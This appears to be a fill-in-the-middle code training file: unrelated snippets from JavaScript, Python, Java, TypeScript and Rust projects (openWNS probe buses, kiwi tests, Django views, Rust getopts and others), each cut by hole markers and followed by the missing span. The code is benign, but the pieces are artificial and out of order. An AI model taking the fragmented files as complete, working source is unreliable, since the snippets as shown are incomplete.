builder.endHeader();
builder.addText(value_.toString());
builder.addEndTag(TAG_NAME);<|fim▁hole|> }
}<|fim▁end|> | builder.endLine(); |
<|file_name|>ScreenLockLandscapeOutlined.js<|end_file_name|><|fim▁begin|>"use strict";
var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault");
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.default = void 0;
var _createSvgIcon = _interopRequireDefault(require("./utils/createSvgIcon"));
var _jsxRuntime = require("react/jsx-runtime");
var _default = (0, _createSvgIcon.default)( /*#__PURE__*/(0, _jsxRuntime.jsx)("path", {
d: "M21 5H3c-1.1 0-2 .9-2 2v10c0 1.1.9 2 2 2h18c1.1 0 2-.9 2-2V7c0-1.1-.9-2-2-2zm-2 12H5V7h14v10zm-9-1h4c.55 0 1-.45 1-1v-3c0-.55-.45-1-1-1v-1c0-1.11-.9-2-2-2-1.11 0-2 .9-2 2v1c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1zm.8-6c0-.66.54-1.2 1.2-1.2s1.2.54 1.2 1.2v1h-2.4v-1z"<|fim▁hole|><|fim▁end|> | }), 'ScreenLockLandscapeOutlined');
exports.default = _default; |
<|file_name|>probebus.py<|end_file_name|><|fim▁begin|>###############################################################################
# This file is part of openWNS (open Wireless Network Simulator)
# _____________________________________________________________________________
#
# Copyright (C) 2004-2007
# Chair of Communication Networks (ComNets)
# Kopernikusstr. 16, D-52074 Aachen, Germany
# phone: ++49-241-80-27910,
# fax: ++49-241-80-22242
# email: [email protected]
# www: http://www.openwns.org
# _____________________________________________________________________________
#
# openWNS is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License version 2 as published by the
# Free Software Foundation;
#
# openWNS is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import openwns
import openwns.logger
from openwns.pyconfig import attrsetter
import openwns.interface
class NeedsFilename(openwns.interface.Interface):
@openwns.interface.abstractmethod
def setFilename(self, filename):
pass
class MeasurementSource(object):
def __init__(self):
object.__init__(self)
self.observers = []
def addObserver(self, probeBus):
self.observers.append(probeBus)
return probeBus
class ProbeBus(MeasurementSource):
def __init__(self):
MeasurementSource.__init__(self)
def observe(self, probeBus):
probeBus.addObserver(self)
return probeBus
class ProbeBusRegistry(object):
def __init__(self):
super(ProbeBusRegistry, self).__init__()
self.measurementSources = {}
self.logger = openwns.logger.Logger("WNS", "ProbeBusRegistry", True)
def getMeasurementSource(self, probeBusID):
if probeBusID not in self.measurementSources:
self.measurementSources[probeBusID] = MeasurementSource()
return self.measurementSources[probeBusID]
def removeMeasurementSource(self, probeBusID):
self.measurementSources.pop(probeBusID)
def getMeasurementSources(self):
return self.measurementSources
class PassThroughProbeBus(ProbeBus):
""" The PassThroughProbeBus always accepts and always forwards. """
nameInFactory = "PassThroughProbeBus"
def __init__(self):
ProbeBus.__init__(self)
class SettlingTimeGuardProbeBus(ProbeBus):
""" The SettlingTimeGuardProbeBus only accepts if the global settling time (transient phase)
has elapsed"""
nameInFactory = "SettlingTimeGuardProbeBus"
def __init__(self, settlingTime):
ProbeBus.__init__(self)
self.settlingTime = settlingTime
class LoggingProbeBus(ProbeBus):
""" The LoggingProbeBus always accepts and logs the message to the logging subsystem.
"""
nameInFactory = "LoggingProbeBus"
def __init__(self, probeName='', parentLogger=None):
ProbeBus.__init__(self)
if len(probeName) > 0:
probeName = '.' + probeName
self.logger = openwns.logger.Logger("WNS", "LoggingProbeBus"+probeName, True, parentLogger)
class PythonProbeBus(ProbeBus):
""" Use the PythonProbeBus to do all your probing work in python. Specify what to do
in accepts, onMeasurement, output from within your configuration file."""
nameInFactory = "PythonProbeBus"
def _dummyOnMeasurement(timestamp, value, reg):
pass
def _dummyOutput():
pass
def __init__(self, acceptsFunction, onMeasurementFunction = _dummyOnMeasurement, outputFunction = _dummyOutput):
ProbeBus.__init__(self)
self.accepts = acceptsFunction
self.onMeasurement = onMeasurementFunction
self.output = outputFunction
self.reportErrors = True
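# A minimal usage sketch (illustrative only; the callable signatures follow
# the dummy defaults above, and the names `values`/`dumpValues`/`pythonProbe`
# are made up):
#
#   values = []
#   def dumpValues():
#       print values
#   pythonProbe = PythonProbeBus(
#       acceptsFunction=lambda *args: True,
#       onMeasurementFunction=lambda timestamp, value, reg: values.append(value),
#       outputFunction=dumpValues)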
class TimeWindowProbeBus(ProbeBus):
""" Only accepts for a certain time window given by start and end time"""
nameInFactory = "TimeWindowProbeBus"
def __init__(self, start, end):
ProbeBus.__init__(self)
self.start = start
self.end = end
class TimeSeriesProbeBus(ProbeBus):
""" The LogEval ProbeBus always accepts and logs the values into a file.
"""
nameInFactory = "TimeSeriesProbeBus"
outputFilename = None
format = None
timePrecision = None
valuePrecision = None
name = None
description = None
contextKeys = None
def __init__(self, outputFilename, format, timePrecision, valuePrecision, name, desc, contextKeys):
ProbeBus.__init__(self)
self.outputFilename = outputFilename
self.format = format
self.timePrecision = timePrecision
self.valuePrecision = valuePrecision
self.name = name
self.description = desc
self.contextKeys = contextKeys
class ContextFilterProbeBus(ProbeBus):
nameInFactory = "ContextFilterProbeBus"
idName = None
idValues = None
def __init__(self, _idName, _idValues, _outputName = None):
ProbeBus.__init__(self)
self.idName = _idName
self.idValues = _idValues
class ConstantContextProvider(object):
__plugin__ = "wns.ProbeBus.ConstantContextProvider"
""" Name in the static factory """
key = None
""" The name of the context """
value = None
""" A constant integer value """
def __init__(self, key, value):
super(ConstantContextProvider, self).__init__()
self.key = key
self.value = value
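# Sketch (the context key 'NodeType' and its value are made-up examples):
#
#   nodeTypeContext = ConstantContextProvider('NodeType', 1)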
class StatEvalProbeBus(ProbeBus):
nameInFactory = "StatEvalProbeBus"
statEval = None
appendFlag = None
def __init__(self, outputFilename, statEvalConfig):
ProbeBus.__init__(self)
self.outputFilename = outputFilename
self.statEval = statEvalConfig
if statEvalConfig.appendFlag is None:
self.appendFlag = False
else:
self.appendFlag = statEvalConfig.appendFlag
class TabPar:
"""
Helper Class to configure the TableProbeBus.
Configure one of these for each dimension of your table.
Parameters:
idName: the name in the IDregistry/Context under which the
value for this axis should be searched
minimum: min value of the axis
maximum: max value of the axis
resolution: number of equidistant intervals into which the
range from min to max will be divided. Note that
the maximum value will be counted into the last interval
"""
idName = None
minimum = None
maximum = None
resolution = None
def __init__(self, idName, minimum, maximum, resolution):
self.idName = idName
self.minimum = minimum
self.maximum = maximum
self.resolution = resolution
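# Illustrative reading of the parameters above ('CQI' is a made-up context
# key): TabPar('CQI', 0, 15, 5) splits the range [0, 15] into five
# equidistant intervals of width 3, and a measurement with CQI == 15 is
# counted in the last interval.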
class TableProbeBus(ProbeBus):
"""
The TableProbeBus consumes measurement values and sorts them
into n-dimensional tables of statistical evaluation objects.
Parameters:
axisParams: list of TabPar objects, one for each dimension of the desired table
outputFilename: base name of the output files produced by the TableProbeBus
evals: list of strings with the requested statistics, possible values are:
'mean', 'variance', 'relativeVariance', 'coeffOfVariation', 'M2', 'M3', 'Z3',
'skewness', 'deviation', 'relativeDeviation', 'trials', 'min', 'max'
formats: list of strings with the requested output formats, possible values are:
'HumanReadable', 'PythonReadable', 'MatlabReadable', 'MatlabReadableSparse'
"""
nameInFactory = "TableProbeBus"
axisParams = None
outputFilename = None
evals = None
formats = None
def __init__(self, axisParams, outputFilename, evals = ['mean'], formats = ['HumanReadable']):
ProbeBus.__init__(self)
self.axisParams = axisParams
self.outputFilename = outputFilename
self.evals = list(set(evals)) # filter out potential duplicates
self.formats = list(set(formats)) # filter out potential duplicates
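# A configuration sketch for a one-dimensional table (the context key
# 'MAC.StationId' and the output file name are illustrative assumptions):
#
#   perStationTable = TableProbeBus(
#       axisParams=[TabPar('MAC.StationId', 0, 10, 10)],
#       outputFilename='throughput_per_station',
#       evals=['mean', 'trials'],
#       formats=['HumanReadable'])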
class TextProbeBus(ProbeBus):
"""
Wrapper for a ProbeText StatEval
"""
nameInFactory = "TextProbeBus"
key = None
outputFilename = None
evalConfig = None
writeHeader = None
prependSimTimeFlag = None
simTimePrecision = None
simTimeWidth = None
skipInterval = None
def __init__(self, outputFilename, key, description):
ProbeBus.__init__(self)
self.key = key
self.outputFilename = outputFilename
self.writeHeader = True
self.prependSimTimeFlag = True<|fim▁hole|> self.simTimePrecision = 7
self.simTimeWidth = 10
self.skipInterval = 0
self.isJSON = False
class JSONProbeBus(TextProbeBus):
def __init__(self, name, key, description):
TextProbeBus.__init__(self, name, key, description)
self.isJSON = True<|fim▁end|> | |
<|file_name|>history_delete_history.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import os, sys
sys.path.insert( 0, os.path.dirname( __file__ ) )<|fim▁hole|>try:
assert sys.argv[2]
except IndexError:
print 'usage: %s key url [purge (true/false)] ' % os.path.basename( sys.argv[0] )
sys.exit( 1 )
try:
data = {}
data[ 'purge' ] = sys.argv[3]
except IndexError:
pass
delete( sys.argv[1], sys.argv[2], data )<|fim▁end|> | from common import delete
|
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read().replace('.. :changelog:', '')
requirements = [
# TODO: put package requirements here
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='kubestack',
version='0.1.0',
description="Python app to manage dynamic Jenkins slaves with Kubernetes",
long_description=readme + '\n\n' + history,
author="Yolanda Robla",
author_email='[email protected]',
url='https://github.com/yrobla/kubestack',
packages=[
'kubestack',
],
package_dir={'kubestack':
'kubestack'},
include_package_data=True,
install_requires=requirements,
license="BSD",
zip_safe=False,
keywords='kubestack',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
test_suite='tests',<|fim▁hole|><|fim▁end|> | tests_require=test_requirements
) |
<|file_name|>filesystem_test.py<|end_file_name|><|fim▁begin|>import sys
from mock import (
patch, Mock
)
from pytest import raises
from ..test_helper import argv_kiwi_tests
import kiwi
from kiwi.exceptions import KiwiFileSystemSetupError
from kiwi.builder.filesystem import FileSystemBuilder
class TestFileSystemBuilder:
@patch('kiwi.builder.filesystem.FileSystemSetup')
@patch('platform.machine')
def setup(self, mock_machine, mock_fs_setup):
mock_machine.return_value = 'x86_64'
self.loop_provider = Mock()
self.loop_provider.get_device = Mock(
return_value='/dev/loop1'
)
self.loop_provider.create = Mock()
self.filesystem = Mock()
self.filesystem.create_on_device = Mock()
self.filesystem.create_on_file = Mock()
self.filesystem.sync_data = Mock()
self.xml_state = Mock()
self.xml_state.get_build_type_unpartitioned_bytes = Mock(
return_value=0
)
self.xml_state.get_fs_mount_option_list = Mock(
return_value=['async']
)
self.xml_state.get_fs_create_option_list = Mock(
return_value=['-O', 'option']
)
self.xml_state.get_build_type_name = Mock(
return_value='ext3'
)
self.xml_state.get_image_version = Mock(
return_value='1.2.3'
)
self.xml_state.xml_data.get_name = Mock(
return_value='myimage'
)
self.xml_state.build_type.get_target_blocksize = Mock(
return_value=4096
)
self.xml_state.build_type.get_squashfscompression = Mock(
return_value='gzip'
)
self.fs_setup = Mock()
self.fs_setup.get_size_mbytes = Mock(
return_value=42
)
self.setup = Mock()
kiwi.builder.filesystem.SystemSetup = Mock(
return_value=self.setup
)
def test_create_unknown_filesystem(self):
self.xml_state.get_build_type_name = Mock(
return_value='super-fs'
)
fs = FileSystemBuilder(
self.xml_state, 'target_dir', 'root_dir'
)
with raises(KiwiFileSystemSetupError):
fs.create()
def test_no_filesystem_configured(self):
self.xml_state.get_build_type_name = Mock(
return_value='pxe'
)
self.xml_state.build_type.get_filesystem = Mock(
return_value=None
)
with raises(KiwiFileSystemSetupError):
FileSystemBuilder(
self.xml_state, 'target_dir', 'root_dir'
)
@patch('kiwi.builder.filesystem.LoopDevice')
@patch('kiwi.builder.filesystem.FileSystem')
@patch('kiwi.builder.filesystem.FileSystemSetup')
@patch('platform.machine')
def test_create_on_loop(
self, mock_machine, mock_fs_setup, mock_fs, mock_loop
):
mock_machine.return_value = 'x86_64'
mock_fs_setup.return_value = self.fs_setup
mock_fs.return_value = self.filesystem
mock_loop.return_value = self.loop_provider
fs = FileSystemBuilder(
self.xml_state, 'target_dir', 'root_dir'
)
fs.create()
mock_loop.assert_called_once_with(
'target_dir/myimage.x86_64-1.2.3.ext3', 42, 4096
)
self.loop_provider.create.assert_called_once_with()
mock_fs.assert_called_once_with(
'ext3', self.loop_provider, 'root_dir/', {
'mount_options': ['async'],
'create_options': ['-O', 'option']
}
)
self.filesystem.create_on_device.assert_called_once_with(None)
self.filesystem.sync_data.assert_called_once_with(
['image', '.profile', '.kconfig', '.buildenv', 'var/cache/kiwi']
)
self.setup.export_package_verification.assert_called_once_with(
'target_dir'
)
self.setup.export_package_list.assert_called_once_with(
'target_dir'
)
@patch('kiwi.builder.filesystem.FileSystem')
@patch('kiwi.builder.filesystem.DeviceProvider')
@patch('platform.machine')
def test_create_on_file(
self, mock_machine, mock_provider, mock_fs
):
mock_machine.return_value = 'x86_64'
provider = Mock()
mock_provider.return_value = provider
mock_fs.return_value = self.filesystem
self.xml_state.get_build_type_name = Mock(
return_value='squashfs'
)
fs = FileSystemBuilder(
self.xml_state, 'target_dir', 'root_dir'
)
fs.create()
mock_fs.assert_called_once_with(
'squashfs', provider, 'root_dir', {
'mount_options': ['async'],
'create_options': ['-O', 'option'],
'compression': 'gzip'
}
)
self.filesystem.create_on_file.assert_called_once_with(
'target_dir/myimage.x86_64-1.2.3.squashfs', None,
['image', '.profile', '.kconfig', '.buildenv', 'var/cache/kiwi']
)<|fim▁hole|> self.setup.export_package_list.assert_called_once_with(
'target_dir'
)
def teardown(self):
sys.argv = argv_kiwi_tests<|fim▁end|> | self.setup.export_package_verification.assert_called_once_with(
'target_dir'
) |
<|file_name|>test_task.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
import nose
from nose.tools import assert_equal
from pyomni.object.task import OmniTask
class TestOmniTask(object):
def test_get_xml(self):<|fim▁hole|> nose.main(argv=['nosetests', '-s', '-v'], defaultTest=__file__)<|fim▁end|> | return
if __name__ == '__main__': |
<|file_name|>MyLinksDAOITUtil.java<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2000 - 2021 Silverpeas
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* As a special exception to the terms and conditions of version 3.0 of
* the GPL, you may redistribute this Program in connection with Free/Libre
* Open Source Software ("FLOSS") applications as described in Silverpeas's
* FLOSS exception. You should have received a copy of the text describing
* the FLOSS exception, and it is also available here:
* "https://www.silverpeas.org/legal/floss_exception.html"
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.silverpeas.core.mylinks.dao;
import org.silverpeas.core.persistence.jdbc.sql.JdbcSqlQuery;
import java.sql.SQLException;
import java.util.List;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.contains;
import static org.hamcrest.Matchers.empty;
/**
* @author silveryocha
*/
public class MyLinksDAOITUtil {
private MyLinksDAOITUtil() {
}
static void assertLinkIds(final List<Integer> actualIds, final Integer... expectedIds) {
if (expectedIds.length == 0) {
assertThat(actualIds, empty());
} else {
assertThat(actualIds, contains(expectedIds));
}
}
static List<Integer> getAllLinkIds() throws SQLException {
return JdbcSqlQuery.createSelect("linkid")
.from("SB_MyLinks_Link")
.orderBy("linkid")
.execute(r -> r.getInt(1));
}
<|fim▁hole|> assertThat(actualIds, contains(expectedIds));
}
}
static List<Integer> getAllCategoryIds() throws SQLException {
return JdbcSqlQuery.createSelect("catid")
.from("SB_MyLinks_Cat")
.orderBy("catid")
.execute(r -> r.getInt(1));
}
static void assertOfCouples(final List<String> actualCouples, final String... expectedCouples) {
if (expectedCouples.length == 0) {
assertThat(actualCouples, empty());
} else {
assertThat(actualCouples, contains(expectedCouples));
}
}
static List<String> getAllOfCouples() throws SQLException {
return JdbcSqlQuery.createSelect("*")
.from("SB_MyLinks_LinkCat")
.orderBy("catid, linkid")
.execute(r -> r.getInt("catid") + "/" + r.getInt("linkid"));
}
}<|fim▁end|> | static void assertCategoryIds(final List<Integer> actualIds, final Integer... expectedIds) {
if (expectedIds.length == 0) {
assertThat(actualIds, empty());
} else { |
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from rest_framework import generics, permissions, views, response,status
from .models import Account
from .serializers import AccountCreateSerializer, AccountSerializer, AuthenticateSerializer, \<|fim▁hole|> UpdateAccountSerializer, AccountRetrieveSerializer
# Create your views here.
class AccountCreateView(generics.CreateAPIView):
queryset = Account.objects.all()
serializer_class = AccountCreateSerializer
permission_classes = [permissions.AllowAny]
class AccountListView(generics.ListAPIView):
queryset = Account.objects.all()
serializer_class = AccountSerializer
permission_classes = [permissions.IsAuthenticated]
class AccountRetrieveView(generics.RetrieveAPIView):
queryset = Account.objects.all()
serializer_class = AccountRetrieveSerializer
class UpdateAccountView(generics.UpdateAPIView):
queryset = Account.objects.all()
serializer_class = UpdateAccountSerializer
# permission_classes = [permissions.IsAuthenticated]
class AccountAuthenticationView(views.APIView):
queryset = Account.objects.all()
serializer_class = AuthenticateSerializer
def post(self, request):
data = request.data
serializer = AuthenticateSerializer(data=data)
if serializer.is_valid(raise_exception=True):
new_data = serializer.data
return response.Response(new_data, status=status.HTTP_200_OK)
return response.Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)<|fim▁end|> | |
<|file_name|>test_dynamicfields.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import unittest
import mock<|fim▁hole|>
class DynamicFieldsMixinTestCase(unittest.TestCase):
"""Test functionality of the DynamicFieldsMixin class."""
def test_restrict_dynamic_fields(self):<|fim▁end|> | |
<|file_name|>leftMenuAutosize.ts<|end_file_name|><|fim▁begin|>/// <reference path="../../config/config.ts" />
/// <reference path="../interfaces/directives/IDirective.ts" />
declare var angular:any;
//Directive responsible for manipulating left (top) menu icons area when available size change
module Directives {
'use strict';
export class LeftMenuAutosize implements Directives.IDirective {
private static Timeout:any;
private static Window:any;
private Scope:any;
private Element:any;
private Promise:any;
private WindowDimensions:any;
private MenuDimensions:any;
//@ngInject
public static DirectiveOptions($timeout:any, $window:any):any {
LeftMenuAutosize.Timeout = $timeout;
LeftMenuAutosize.Window = $window;
return {
restrict: 'A',
scope: {
expandIconSize: '=',
iconSize: '=',
iconCount: '='
},
replace: false,
link: function ($scope:any, $linkElement:any, $linkAttributes:any):void {
var instance:Directives.IDirective = new LeftMenuAutosize();
instance.Link($scope, $linkElement, $linkAttributes);
}
};
}
public Link($scope:any, $linkElement:any, $linkAttributes:any):void {
this.Scope = $scope;
this.Element = $linkElement;
this.SizeChanged();
$scope.$watch('iconCount', this.SizeChanged.bind(this));
angular.element(LeftMenuAutosize.Window).on('resize', this.SizeChanged.bind(this));
this.BindExpandButton();
}
private SizeChanged():void {<|fim▁hole|> LeftMenuAutosize.Timeout.cancel(this.Promise);
this.Promise = LeftMenuAutosize.Timeout(this.SetIconsVisibility.bind(this), 0, false);
}
private MeasureDimensions():void {
this.WindowDimensions = {
width: LeftMenuAutosize.Window.innerWidth,
height: LeftMenuAutosize.Window.innerHeight
};
this.MenuDimensions = {
width: this.Element[0].offsetWidth,
height: this.Element[0].offsetHeight
};
this.MenuDimensions.primaryDimensionSize = Math.max(this.MenuDimensions.width, this.MenuDimensions.height);
this.MenuDimensions.primaryDimension = this.MenuDimensions.height > this.MenuDimensions.width ? 'height' : 'width';
this.MenuDimensions.secondaryDimension = this.MenuDimensions.primaryDimension === 'height' ? 'width' : 'height';
}
private SetIconsVisibility():void {
//Collapse menu
if (this.Element.hasClass('expanded')) {
this.ExpandCollapseMenu(null, true);
}
//Assume that everything can fit
this.Element.removeClass('collapsed');
var elementChildren:any[] = this.Element.children();
angular.forEach(elementChildren, function (item:any, key:number):void {
angular.element(item).removeClass('collapsed');
});
//Measure space
this.MeasureDimensions();
var availableSpace:number = this.MenuDimensions.primaryDimensionSize;
var everythingCanFit:boolean = (this.Scope.iconCount || 0) * this.Scope.iconSize <= availableSpace;
if (!everythingCanFit) {
//Enable collapse-expand of panel
this.Element.addClass('collapsed');
//Hide records that cannot fit
var canFitNumber:number = Math.floor((availableSpace - this.Scope.expandIconSize) / this.Scope.iconSize);
angular.forEach(elementChildren, function (item:any, key:number):void {
if (item.className !== 'menuEntityExpand' && key >= canFitNumber) {
angular.element(item).addClass('collapsed');
}
});
}
}
private BindExpandButton():void {
var toggle:any = this.Element[0].querySelector('.menuEntityExpand');
toggle.onclick = this.ExpandCollapseMenu.bind(this);
toggle.onblur = this.ExpandCollapseMenu.bind(this);
}
private ExpandCollapseMenu(event:any, collapse:boolean):void {
var _this:LeftMenuAutosize = this;
var isExpanded:boolean = this.Element.hasClass('expanded');
var shouldCollapse:boolean = collapse !== null ? collapse : isExpanded;
if (event && event.type === 'blur') {
shouldCollapse = true;
}
//Toggle
if (shouldCollapse) {
//Collapse
setTimeout(function ():void {
_this.Element.addClass('collapsed');
_this.Element.removeClass('expanded');
_this.Element.css(_this.MenuDimensions.primaryDimension, '');
_this.Element.css(_this.MenuDimensions.secondaryDimension, '');
_this.Element.css('max-' + _this.MenuDimensions.secondaryDimension, '');
}, 200);
} else {
//Calculate required size
var totalCount:number = this.Scope.iconCount + 1;
var primaryDimensionFitCount:number = Math.floor((this.MenuDimensions.primaryDimensionSize - this.Scope.expandIconSize) / this.Scope.iconSize);
var requiredSecondaryDimensionFitCount:number = Math.ceil(totalCount / primaryDimensionFitCount);
var requiredSecondaryDimensionSize:number = Math.min(requiredSecondaryDimensionFitCount * this.Scope.iconSize,
this.WindowDimensions[this.MenuDimensions.secondaryDimension] - this.Scope.iconSize);
var secondaryDimensionRealFitCount:number = Math.floor(requiredSecondaryDimensionSize / this.Scope.iconSize);
var primaryDimensionReconciledFitCount:number = Math.ceil(totalCount / secondaryDimensionRealFitCount);
var primaryDimensionReconciledSize:number = Math.min(primaryDimensionReconciledFitCount * this.Scope.iconSize,
this.WindowDimensions[this.MenuDimensions.primaryDimension] - this.Scope.iconSize);
//Expand
this.Element.removeClass('collapsed');
this.Element.addClass('expanded');
this.Element.css(this.MenuDimensions.primaryDimension, primaryDimensionReconciledSize + 'px');
this.Element.css(this.MenuDimensions.secondaryDimension, requiredSecondaryDimensionSize + 'px');
this.Element.css('max-' + this.MenuDimensions.secondaryDimension, requiredSecondaryDimensionSize + 'px');
}
}
}
}<|fim▁end|> | |
<|file_name|>Pascal's Triangle.py<|end_file_name|><|fim▁begin|>class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
pascal = []
if numRows >= 1:
pascal.append([1])
for i in range(1, numRows):
pascal.append([pascal[-1][0]])
for j in range(1, len(pascal[-2])):
pascal[-1].append(pascal[-2][j - 1] + pascal[-2][j])<|fim▁hole|> return pascal<|fim▁end|> | pascal[-1].append(pascal[-2][-1]) |
<|file_name|>getopts.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Simple getopt alternative.
//!
//! Construct a vector of options, either by using `reqopt`, `optopt`, and `optflag`
//! or by building them from components yourself, and pass them to `getopts`,
//! along with a vector of actual arguments (not including `argv[0]`). You'll
//! either get a failure code back, or a match. You'll have to verify whether
//! the amount of 'free' arguments in the match is what you expect. Use `opt_*`
//! accessors to get argument values out of the matches object.
//!
//! Single-character options are expected to appear on the command line with a
//! single preceding dash; multiple-character options are expected to be
//! preceded by two dashes. Options that expect an argument accept their
//! argument following either a space or an equals sign. Single-character
//! options don't require the space.
//!
//! # Example
//!
//! The following example shows simple command line parsing for an application
//! that requires an input file to be specified, accepts an optional output
//! file name following `-o`, and accepts both `-h` and `--help` as optional flags.
//!
//! ~~~{.rust}
//! extern mod extra;
//! use extra::getopts::*;
//! use std::os;
//!
//! fn do_work(inp: &str, out: Option<~str>) {
//! println(inp);
//! println(match out {
//! Some(x) => x,
//! None => ~"No Output"
//! });
//! }
//!
//! fn print_usage(program: &str, _opts: &[Opt]) {
//! println!("Usage: {} [options]", program);
//! println("-o\t\tOutput");
//! println("-h --help\tUsage");
//! }
//!
//! fn main() {
//! let args = os::args();
//!
//! let program = args[0].clone();
//!
//! let opts = ~[
//! optopt("o"),
//! optflag("h"),
//! optflag("help")
//! ];
//! let matches = match getopts(args.tail(), opts) {
//! Ok(m) => { m }
//! Err(f) => { fail2!(f.to_err_msg()) }
//! };
//! if matches.opt_present("h") || matches.opt_present("help") {
//! print_usage(program, opts);
//! return;
//! }
//! let output = matches.opt_str("o");
//! let input: &str = if !matches.free.is_empty() {
//! matches.free[0].clone()
//! } else {
//! print_usage(program, opts);
//! return;
//! };
//! do_work(input, output);
//! }
//! ~~~
use std::cmp::Eq;
use std::result::{Err, Ok};
use std::result;
use std::option::{Some, None};
use std::vec;
/// Name of an option. Either a string or a single char.
#[deriving(Clone, Eq)]
#[allow(missing_doc)]
pub enum Name {
Long(~str),
Short(char),
}
/// Describes whether an option has an argument.
#[deriving(Clone, Eq)]
#[allow(missing_doc)]
pub enum HasArg {
Yes,
No,
Maybe,
}
/// Describes how often an option may occur.
#[deriving(Clone, Eq)]
#[allow(missing_doc)]
pub enum Occur {
Req,
Optional,
Multi,
}
/// A description of a possible option.
#[deriving(Clone, Eq)]
pub struct Opt {
/// Name of the option
name: Name,
/// Whether it has an argument
hasarg: HasArg,
/// How often it can occur
occur: Occur,
/// Which options it aliases
aliases: ~[Opt],
}
/// Describes whether an option is given at all or has a value.
#[deriving(Clone, Eq)]
enum Optval {
Val(~str),
Given,
}
/// The result of checking command line arguments. Contains a vector
/// of matches and a vector of free strings.
#[deriving(Clone, Eq)]
pub struct Matches {
/// Options that matched
opts: ~[Opt],
/// Values of the Options that matched
vals: ~[~[Optval]],
/// Free string fragments
free: ~[~str]
}
/// The type returned when the command line does not conform to the
/// expected format. Pass this value to `to_err_msg` to get an error message.
#[deriving(Clone, Eq, ToStr)]
#[allow(missing_doc)]
pub enum Fail_ {
ArgumentMissing(~str),
UnrecognizedOption(~str),
OptionMissing(~str),
OptionDuplicated(~str),
UnexpectedArgument(~str),
}
/// The type of failure that occurred.
#[deriving(Eq)]
#[allow(missing_doc)]
pub enum FailType {
ArgumentMissing_,
UnrecognizedOption_,
OptionMissing_,
OptionDuplicated_,
UnexpectedArgument_,
}
/// The result of parsing a command line with a set of options.
pub type Result = result::Result<Matches, Fail_>;
impl Name {
fn from_str(nm: &str) -> Name {
if nm.len() == 1u {
Short(nm.char_at(0u))
} else {
Long(nm.to_owned())
}
}
fn to_str(&self) -> ~str {
match *self {
Short(ch) => ch.to_str(),
Long(ref s) => s.to_owned()
}
}
}
impl Matches {
/// FIXME: #9311 This used to be private, but rustpkg somehow managed to depend on it.
/// No idea what this does.
pub fn opt_vals(&self, nm: &str) -> ~[Optval] {
match find_opt(self.opts, Name::from_str(nm)) {
Some(id) => self.vals[id].clone(),
None => fail2!("No option '{}' defined", nm)
}
}
/// FIXME: #9311 This used to be private, but rustpkg somehow managed to depend on it.
/// No idea what this does.
pub fn opt_val(&self, nm: &str) -> Option<Optval> {
let vals = self.opt_vals(nm);
if vals.is_empty() {
None
} else {
Some(vals[0].clone())
}
}
/// Returns true if an option was matched.
pub fn opt_present(&self, nm: &str) -> bool {
!self.opt_vals(nm).is_empty()
}
/// Returns the number of times an option was matched.
pub fn opt_count(&self, nm: &str) -> uint {
self.opt_vals(nm).len()
}
/// Returns true if any of several options were matched.
pub fn opts_present(&self, names: &[~str]) -> bool {
for nm in names.iter() {
match find_opt(self.opts, Name::from_str(*nm)) {
Some(id) if !self.vals[id].is_empty() => return true,
_ => (),
};
}
false
}
/// Returns the string argument supplied to one of several matching options or `None`.
pub fn opts_str(&self, names: &[~str]) -> Option<~str> {
for nm in names.iter() {
match self.opt_val(*nm) {
Some(Val(ref s)) => return Some(s.clone()),
_ => ()
}
}
None
}
/// Returns a vector of the arguments provided to all matches of the given
/// option.
///
/// Used when an option accepts multiple values.
pub fn opt_strs(&self, nm: &str) -> ~[~str] {
let mut acc: ~[~str] = ~[];
let r = self.opt_vals(nm);
for v in r.iter() {
match *v {
Val(ref s) => acc.push((*s).clone()),
_ => ()
}
}
acc
}
/// Returns the string argument supplied to a matching option or `None`.
pub fn opt_str(&self, nm: &str) -> Option<~str> {
let vals = self.opt_vals(nm);
if vals.is_empty() {
return None::<~str>;
}
match vals[0] {
Val(ref s) => Some((*s).clone()),
_ => None
}
}
/// Returns the matching string, a default, or none.
///
/// Returns none if the option was not present, `def` if the option was
/// present but no argument was provided, and the argument if the option was
